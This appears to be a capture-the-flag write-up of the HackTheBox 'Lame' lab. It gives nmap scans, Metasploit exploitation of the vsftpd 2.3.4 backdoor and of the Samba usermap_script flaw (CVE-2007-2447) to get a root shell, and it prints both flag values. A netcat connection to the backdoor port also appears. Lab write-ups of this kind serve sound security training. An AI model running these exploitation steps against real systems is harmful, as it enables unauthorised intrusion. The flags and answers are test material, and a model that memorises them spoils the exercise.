HTB:Lame[WriteUP]

Date: 2024-10-13 18:21:02


Connect to the HTB server and start the target machine

Target IP: 10.10.10.3

Assigned IP: 10.10.16.7


1.How many of the nmap top 1000 TCP ports are open on the remote host?

使用nmap对靶机进行前1000端口进行扫描:

nmap -p1-1000 -T4 --min-rate=1000 -sS {TARGET_IP}

The scan results show 4 open ports on the target: 21, 22, 139 and 445.


2.What version of VSFTPd is running on Lame?

Run nmap's default scripts and service-version detection against port 21 on the target:

nmap -p 21 -sC -sV {TARGET_IP}

In the VERSION column of the scan results, the vsftpd version is 2.3.4.


3.There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

Start Metasploit:

msfconsole

Search for vulnerability information related to VSFTPd 2.3.4:

search vsftpd 2.3.4

Use the exploit module:

use exploit/unix/ftp/vsftpd_234_backdoor

Show the configurable options:

show options

Set the target IP in the RHOSTS option:

set rhosts {TARGET_IP}

Attempt the exploit:

exploit

The exploit fails (answer: no); a username and password would need to be specified.


4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

Run nmap's default scripts and service-version detection against ports 139 and 445 on the target:

nmap -p 139,445 -sC -sV {TARGET_IP}

The scan results show the target's Samba server version is 3.0.20.


5.What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

A Google search for the vulnerability gives the answer directly: CVE-2007-2447


6.Exploiting CVE-2007-2447 returns a shell as which user?

Access the target's Samba server and list all its shares, logging in with an empty password:

smbclient -L {TARGET_IP}

Use smbmap to scan the permissions on each share:

smbmap -H {TARGET_IP}

The smbmap results show that only the tmp share is readable and writable.

List all files in the tmp share

There are no files containing sensitive information, so the only remaining angle is the Samba server version 3.0.20.

In msfconsole, search for whether Samba 3.0.20 has a known vulnerability:

Use the module:

use exploit/multi/samba/usermap_script

View the exploit module's configuration parameters:

show options

Set the target IP in RHOSTS:

set rhosts {TARGET_IP}

Set the local machine's IP in LHOST:

set lhost {NATIVE_IP}

Run the exploit:

exploit

The current user is shown as: root


7.Submit the flag located in the makis user's home directory.

Find the path of the makis directory:

find / -name 'makis' 2>/dev/null

Enter the directory:

cd /home/makis

List the files in the directory:

ls

View the contents of user.txt:

cat user.txt

USER_FLAG:f249448c9d70f706133439ab6b4e18ce


8.Submit the flag located in root's home directory.

Find the path of root.txt directly and view its contents:

cat `find / -name 'root.txt' 2>/dev/null`

ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97


9.We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports?

Use the script command to switch to an interactive shell:

script /dev/null -c bash

Look at the target's listening sockets:

netstat -tnlp

We can see that the target's local port 21 is open and listening, but the exploit traffic is blocked by a firewall (answer: firewall).

To use this vulnerability, only a user already on the local side of the box could use it, for privilege escalation.
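The firewall conclusion above comes from comparing what the host itself reports as listening with what the external nmap scan could see. The following is an added example (not code from the original post): it parses a constructed `netstat -tnlp` sample in the same format, uses the open-port list from the scan above, and returns the externally bound listeners that the scan did not reach, which is the set a host-level packet filter must be dropping. Port numbers, PIDs and program names in the sample are illustrative.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the format of `netstat -tnlp` (not a capture from
# the real target; ports, PIDs and program names are illustrative).
NETSTAT_SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      4633/vsftpd
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      4750/smbd
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      4750/smbd
tcp        0      0 0.0.0.0:3632            0.0.0.0:*               LISTEN      4661/distccd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      4586/mysqld
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      4629/named
tcp6       0      0 :::22                   :::*                    LISTEN      4686/sshd
"""

# Ports the external nmap scan reported as open (from the write-up above).
NMAP_OPEN = {21, 22, 139, 445}
TARGET_IP = "10.10.10.3"

# proto, recv-q, send-q, local addr:port, foreign addr, LISTEN, pid/program
LINE_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\S+)")


def parse_listeners(netstat_output: str) -> Dict[int, dict]:
    """Map each listening TCP port to its bind address and owning process."""
    listeners = {}
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header lines and non-LISTEN rows
        _proto, addr, port, prog = m.groups()
        listeners[int(port)] = {"addr": addr, "prog": prog}
    return listeners


def externally_bound(addr: str, host_ip: str) -> bool:
    """True if the socket is bound to a wildcard address or the host's own IP."""
    return addr in ("0.0.0.0", "::", host_ip)


def filtered_ports(netstat_output: str, nmap_open: Set[int], host_ip: str) -> List[int]:
    """Listeners that should be reachable from outside but the scan did not see.
    Loopback-only listeners are excluded; the remaining gap is what the firewall drops."""
    listeners = parse_listeners(netstat_output)
    return sorted(p for p, info in listeners.items()
                  if externally_bound(info["addr"], host_ip) and p not in nmap_open)
```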


10.When the VSFTPd backdoor is trigger, what port starts listening?

A Google search shows that triggering this backdoor calls the vsf_sysutil_extra() function, which opens port 6200 on the system.

Use searchsploit to search for an exploit for this vulnerability


11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

Run the exploit script:

python2 49757.py {TARGET_IP}

To demonstrate the privilege escalation, first switch from root to the makis user:

su makis -c bash

Use netcat to connect to the target's local port 6200:

nc 127.0.0.1 6200

root@lame:/# su makis -c bash
makis@lame:/$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused
makis@lame:/$ nc 127.0.0.1 6200
whoami
root

Privilege escalation to root succeeded.

From: https://blog.csdn.net/qq_43007452/article/details/142895280
